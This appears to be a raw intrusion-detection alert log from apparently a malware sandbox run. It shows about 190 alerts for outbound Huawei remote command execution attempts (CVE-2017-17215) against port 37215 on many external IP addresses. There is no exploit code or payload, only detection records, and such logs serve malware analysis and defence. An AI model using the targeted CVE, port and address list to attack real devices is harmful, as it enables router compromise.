                                                    07/10/24-08:27:22.452806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570237215192.168.2.1441.187.84.137
                                                    07/10/24-08:27:30.485790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5338637215192.168.2.14197.155.149.94
                                                    07/10/24-08:26:28.841865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5376837215192.168.2.14197.106.197.9
                                                    07/10/24-08:26:41.395055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635637215192.168.2.14197.150.192.166
                                                    07/10/24-08:27:30.435310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011237215192.168.2.1441.35.177.153
                                                    07/10/24-08:27:28.156684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634437215192.168.2.14179.117.125.253
                                                    07/10/24-08:26:15.849080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176437215192.168.2.1441.116.31.64
                                                    07/10/24-08:26:15.805311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594237215192.168.2.14197.90.185.113
                                                    07/10/24-08:27:22.879790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362237215192.168.2.1441.74.168.137
                                                    07/10/24-08:26:34.210999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416037215192.168.2.14197.199.40.29
                                                    07/10/24-08:26:36.385173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675037215192.168.2.14197.99.147.60
                                                    07/10/24-08:26:29.800404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521637215192.168.2.1441.117.72.158
                                                    07/10/24-08:26:20.110888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971237215192.168.2.14157.205.3.145
                                                    07/10/24-08:26:36.409716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513437215192.168.2.14157.202.21.171
                                                    07/10/24-08:26:11.599014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410637215192.168.2.14146.131.158.186
                                                    07/10/24-08:26:23.344652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507637215192.168.2.14197.133.97.223
                                                    07/10/24-08:26:38.584651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743237215192.168.2.14157.83.169.134
                                                    07/10/24-08:27:07.390012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915237215192.168.2.14157.154.223.165
                                                    07/10/24-08:26:28.763475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815037215192.168.2.14157.213.189.96
                                                    07/10/24-08:26:33.265037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14157.121.100.213
                                                    07/10/24-08:27:17.104843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927437215192.168.2.14197.139.237.26
                                                    07/10/24-08:26:47.895681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274237215192.168.2.14157.61.247.78
                                                    07/10/24-08:26:52.024313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885037215192.168.2.14157.50.120.30
                                                    07/10/24-08:27:13.721350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733237215192.168.2.14197.212.209.11
                                                    07/10/24-08:27:02.880964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097437215192.168.2.14168.147.152.245
                                                    07/10/24-08:26:47.960841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244637215192.168.2.1441.15.17.218
                                                    07/10/24-08:27:32.558731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411637215192.168.2.1452.115.48.195
                                                    07/10/24-08:27:08.446107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417437215192.168.2.14197.132.221.106
                                                    07/10/24-08:27:14.667956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153237215192.168.2.1441.65.170.123
                                                    07/10/24-08:27:20.515408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731437215192.168.2.14197.231.178.104
                                                    07/10/24-08:26:22.275935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497437215192.168.2.1497.218.55.3
                                                    07/10/24-08:26:36.383981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485037215192.168.2.14152.35.148.209
                                                    07/10/24-08:26:17.989941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093637215192.168.2.1441.64.68.174
                                                    07/10/24-08:27:11.527013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038037215192.168.2.1441.72.235.23
                                                    07/10/24-08:27:05.126538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625237215192.168.2.149.67.121.188
                                                    07/10/24-08:26:28.861784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4945837215192.168.2.1476.166.205.133
                                                    07/10/24-08:26:29.841336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528437215192.168.2.1441.104.204.89
                                                    07/10/24-08:27:31.483215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103637215192.168.2.14157.12.167.194
                                                    07/10/24-08:27:02.702208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437837215192.168.2.14197.34.221.176
                                                    07/10/24-08:27:22.835160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882837215192.168.2.1441.213.19.138
                                                    07/10/24-08:26:42.363938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653637215192.168.2.14197.69.104.28
                                                    07/10/24-08:26:28.782504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819237215192.168.2.14157.210.100.202
                                                    07/10/24-08:26:25.520266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3996037215192.168.2.14161.147.15.98
                                                    07/10/24-08:26:51.939250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621837215192.168.2.1418.191.142.129
                                                    07/10/24-08:26:49.821091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404637215192.168.2.14188.135.180.228
                                                    07/10/24-08:26:52.020493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822037215192.168.2.14202.1.248.106
                                                    07/10/24-08:27:13.836090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660037215192.168.2.1447.226.66.175
                                                    07/10/24-08:26:42.415895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073437215192.168.2.14157.108.71.79
                                                    07/10/24-08:27:20.424605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3916037215192.168.2.14156.36.227.220
                                                    07/10/24-08:27:08.426882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774837215192.168.2.14197.14.123.101
                                                    07/10/24-08:27:30.489960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184037215192.168.2.1441.158.78.222
                                                    07/10/24-08:26:52.004457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523237215192.168.2.14197.186.192.98
                                                    07/10/24-08:26:57.673199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505637215192.168.2.14197.140.74.19
                                                    07/10/24-08:27:08.427949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382037215192.168.2.1441.59.91.80
                                                    07/10/24-08:26:52.021127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979237215192.168.2.14130.121.199.221
                                                    07/10/24-08:26:53.134906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600837215192.168.2.1441.176.113.27
                                                    07/10/24-08:27:14.675779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595037215192.168.2.14197.15.154.226
                                                    07/10/24-08:26:14.777046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435037215192.168.2.1441.211.205.206
                                                    07/10/24-08:26:47.980953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891237215192.168.2.14197.91.35.51
                                                    07/10/24-08:26:22.270060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678637215192.168.2.1441.233.141.255
                                                    07/10/24-08:27:22.936738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772637215192.168.2.14157.225.66.105
                                                    07/10/24-08:27:02.893845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229237215192.168.2.14157.57.218.13
                                                    07/10/24-08:27:34.133115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700237215192.168.2.14197.150.29.130
                                                    07/10/24-08:26:45.604198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946837215192.168.2.14157.13.153.56
                                                    07/10/24-08:27:13.905165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290637215192.168.2.14157.156.42.102
                                                    07/10/24-08:26:13.647460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129837215192.168.2.1443.6.191.125
                                                    07/10/24-08:26:26.483995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911437215192.168.2.14197.184.243.242
                                                    07/10/24-08:27:22.783603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190637215192.168.2.14197.180.101.25
                                                    07/10/24-08:27:14.807456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695237215192.168.2.1440.18.117.216
                                                    07/10/24-08:27:07.392725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219637215192.168.2.141.0.202.42
                                                    07/10/24-08:27:32.607136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752837215192.168.2.14129.77.72.105
                                                    07/10/24-08:26:23.358335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768637215192.168.2.1463.243.153.203
                                                    07/10/24-08:27:28.174408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264437215192.168.2.14147.52.161.30
                                                    07/10/24-08:27:05.179313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425637215192.168.2.14157.151.211.83
                                                    07/10/24-08:26:33.247887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654437215192.168.2.14124.8.79.98
                                                    07/10/24-08:27:17.064764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3943037215192.168.2.1441.117.83.253
                                                    07/10/24-08:27:32.617862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187037215192.168.2.14157.188.35.241
                                                    07/10/24-08:26:11.545606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501037215192.168.2.14157.182.7.2
                                                    07/10/24-08:26:42.404478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988837215192.168.2.14197.163.81.112
                                                    07/10/24-08:27:19.290152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101637215192.168.2.14197.106.48.224
                                                    07/10/24-08:26:34.238192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675437215192.168.2.14197.18.215.161
                                                    07/10/24-08:26:59.842336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466637215192.168.2.14184.92.54.176
                                                    07/10/24-08:26:14.801295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705637215192.168.2.14157.32.78.64
                                                    07/10/24-08:26:13.836737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821037215192.168.2.1441.56.231.65
                                                    07/10/24-08:26:28.682326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927637215192.168.2.14172.241.141.191
                                                    07/10/24-08:26:29.797142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786037215192.168.2.14113.238.180.164
                                                    07/10/24-08:27:05.129654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752637215192.168.2.14157.250.91.178
                                                    07/10/24-08:27:13.905026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659837215192.168.2.14157.10.193.230
                                                    07/10/24-08:26:52.042445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047437215192.168.2.1441.89.75.183
                                                    07/10/24-08:27:13.714524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632637215192.168.2.1485.72.217.44
                                                    07/10/24-08:26:18.021892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3733837215192.168.2.14197.238.163.96
                                                    07/10/24-08:26:33.244914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031637215192.168.2.14197.54.152.189
                                                    07/10/24-08:27:30.423950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443837215192.168.2.145.99.191.132
                                                    07/10/24-08:27:33.934356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673837215192.168.2.1417.76.126.112
                                                    07/10/24-08:26:11.186644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214037215192.168.2.14157.50.56.249
                                                    07/10/24-08:26:43.601357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694237215192.168.2.1441.55.123.193
                                                    07/10/24-08:26:20.128612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044037215192.168.2.14197.182.41.199
                                                    07/10/24-08:26:52.010263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301837215192.168.2.1441.114.205.149
                                                    07/10/24-08:26:11.156956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4394837215192.168.2.14157.209.178.18
                                                    07/10/24-08:26:29.775868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010037215192.168.2.14157.244.14.89
                                                    07/10/24-08:26:29.766220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349037215192.168.2.14115.249.154.233
                                                    07/10/24-08:26:26.596367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3780637215192.168.2.14197.145.27.208
                                                    07/10/24-08:27:13.972304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038837215192.168.2.14159.58.227.109
                                                    07/10/24-08:26:15.852897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5399637215192.168.2.14141.224.13.91
                                                    07/10/24-08:27:27.085141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395237215192.168.2.14157.80.82.188
                                                    07/10/24-08:26:55.429020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734837215192.168.2.14197.43.2.174
                                                    07/10/24-08:26:11.609445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999037215192.168.2.1441.85.36.131
                                                    07/10/24-08:26:25.501206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628237215192.168.2.14157.255.225.244
                                                    07/10/24-08:27:19.329520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121237215192.168.2.14197.119.234.73
                                                    07/10/24-08:27:22.839204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870837215192.168.2.14157.14.25.97
                                                    07/10/24-08:27:20.478672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090637215192.168.2.14157.72.231.165
                                                    07/10/24-08:27:23.923569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034437215192.168.2.14157.254.75.210
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4069837215192.168.2.1441.55.76.203
                                                    07/10/24-08:26:43.668862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124637215192.168.2.1441.180.235.182
                                                    07/10/24-08:27:08.383825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5757637215192.168.2.1441.250.140.89
                                                    07/10/24-08:26:48.012833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932037215192.168.2.14197.224.70.129
                                                    07/10/24-08:27:14.881343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734837215192.168.2.14197.94.122.185
                                                    07/10/24-08:26:41.523308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244637215192.168.2.14197.153.60.33
                                                    07/10/24-08:26:47.939159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438837215192.168.2.14197.86.67.110
                                                    07/10/24-08:27:19.145981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429237215192.168.2.1457.32.100.208
                                                    07/10/24-08:26:26.578603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760437215192.168.2.14197.234.179.98
                                                    07/10/24-08:26:38.543702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947637215192.168.2.1441.171.6.132
                                                    07/10/24-08:26:51.988172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825237215192.168.2.1441.43.37.101
                                                    07/10/24-08:26:55.405669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3872837215192.168.2.14197.221.216.184
                                                    07/10/24-08:27:10.548038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5075037215192.168.2.1441.163.135.89
                                                    07/10/24-08:27:27.126836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931437215192.168.2.14157.72.7.242
                                                    07/10/24-08:27:03.005959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855837215192.168.2.1441.196.45.30
                                                    07/10/24-08:27:19.322147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426837215192.168.2.1441.126.66.218
                                                    07/10/24-08:27:23.932047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5119437215192.168.2.14157.16.68.212
                                                    07/10/24-08:26:28.754764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264237215192.168.2.14157.31.89.157
                                                    07/10/24-08:26:52.020494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6093037215192.168.2.14197.78.25.224
                                                    07/10/24-08:26:42.383706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940037215192.168.2.1439.177.250.223
                                                    07/10/24-08:27:17.055063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498237215192.168.2.14157.25.62.202
                                                    07/10/24-08:27:23.917570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972637215192.168.2.1441.169.230.185
                                                    07/10/24-08:26:38.569394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707037215192.168.2.1441.247.66.46
                                                    07/10/24-08:26:29.794005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485637215192.168.2.14157.120.178.56
                                                    07/10/24-08:26:17.969206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495637215192.168.2.14197.103.172.143
                                                    07/10/24-08:27:11.494437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860437215192.168.2.14157.52.195.166
                                                    07/10/24-08:26:28.639022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256837215192.168.2.14197.52.205.235
                                                    07/10/24-08:27:27.076918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512637215192.168.2.14197.222.231.145
                                                    07/10/24-08:27:33.966412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784237215192.168.2.14197.190.18.59
                                                    07/10/24-08:26:11.614233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473437215192.168.2.14169.111.140.146
                                                    07/10/24-08:27:05.191849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559237215192.168.2.14157.246.87.42
                                                    07/10/24-08:26:18.004121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830837215192.168.2.14157.182.247.140
                                                    07/10/24-08:26:43.681419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869837215192.168.2.1441.25.64.88
                                                    07/10/24-08:26:13.824785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632037215192.168.2.14197.133.195.116
                                                    07/10/24-08:27:22.791682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777037215192.168.2.144.47.239.119
                                                    07/10/24-08:26:29.866986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043637215192.168.2.14157.57.144.172
                                                    07/10/24-08:27:31.453868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041637215192.168.2.149.70.127.199
                                                    07/10/24-08:26:18.000984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618237215192.168.2.14191.43.220.82
                                                    07/10/24-08:27:02.878785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605437215192.168.2.14157.80.10.240
                                                    07/10/24-08:27:32.595538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339437215192.168.2.1441.96.246.166
                                                    07/10/24-08:27:02.733003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486637215192.168.2.14223.95.115.184
                                                    07/10/24-08:27:13.721349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429637215192.168.2.14197.232.180.95
                                                    07/10/24-08:26:43.703555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051237215192.168.2.14197.98.60.117
                                                    07/10/24-08:26:26.524985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900237215192.168.2.1441.250.155.139
                                                    07/10/24-08:27:02.918741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958437215192.168.2.14157.114.88.14
                                                    07/10/24-08:27:05.087236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449637215192.168.2.14145.73.67.52
                                                    07/10/24-08:26:17.964931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906637215192.168.2.14143.4.50.136
                                                    07/10/24-08:26:52.050509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467237215192.168.2.1441.236.240.1
                                                    07/10/24-08:26:36.435676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377637215192.168.2.14197.134.41.175
                                                    07/10/24-08:26:42.376307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917637215192.168.2.14157.128.138.143
                                                    07/10/24-08:27:02.726591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072637215192.168.2.14197.221.197.85
                                                    07/10/24-08:27:30.443855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687437215192.168.2.1448.141.147.44
                                                    07/10/24-08:26:15.873682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283437215192.168.2.1467.19.154.174
                                                    07/10/24-08:27:07.389175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324237215192.168.2.1479.249.136.113
                                                    07/10/24-08:27:33.945203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600037215192.168.2.14148.53.4.169
                                                    07/10/24-08:27:19.321754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592237215192.168.2.14157.41.64.5
                                                    07/10/24-08:26:57.560013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573237215192.168.2.14197.237.184.21
                                                    07/10/24-08:27:13.867297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503437215192.168.2.14157.207.123.151
                                                    07/10/24-08:26:20.175593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489837215192.168.2.14157.252.210.178
                                                    07/10/24-08:26:22.301587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170037215192.168.2.14157.220.115.168
                                                    07/10/24-08:27:22.938789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175237215192.168.2.14197.167.56.90
                                                    07/10/24-08:27:24.882807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280037215192.168.2.14157.103.219.146
                                                    07/10/24-08:26:20.132092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969837215192.168.2.14197.30.112.103
                                                    07/10/24-08:26:25.501206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643237215192.168.2.14172.68.90.187
                                                    07/10/24-08:26:42.176509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589037215192.168.2.14106.81.72.235
                                                    07/10/24-08:26:38.548975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649037215192.168.2.1441.96.190.120
                                                    07/10/24-08:27:28.128256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577037215192.168.2.1435.190.84.205
                                                    07/10/24-08:26:43.926715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127037215192.168.2.1441.199.67.197
                                                    07/10/24-08:27:08.415966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649037215192.168.2.14197.109.68.109
                                                    07/10/24-08:27:20.482913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415637215192.168.2.14157.137.212.190
                                                    07/10/24-08:26:36.440414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661637215192.168.2.14197.15.100.101
                                                    07/10/24-08:27:28.096312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845237215192.168.2.1441.139.237.216
                                                    07/10/24-08:26:20.140373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359037215192.168.2.14197.29.91.154
                                                    07/10/24-08:26:22.294435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266037215192.168.2.1441.35.162.182
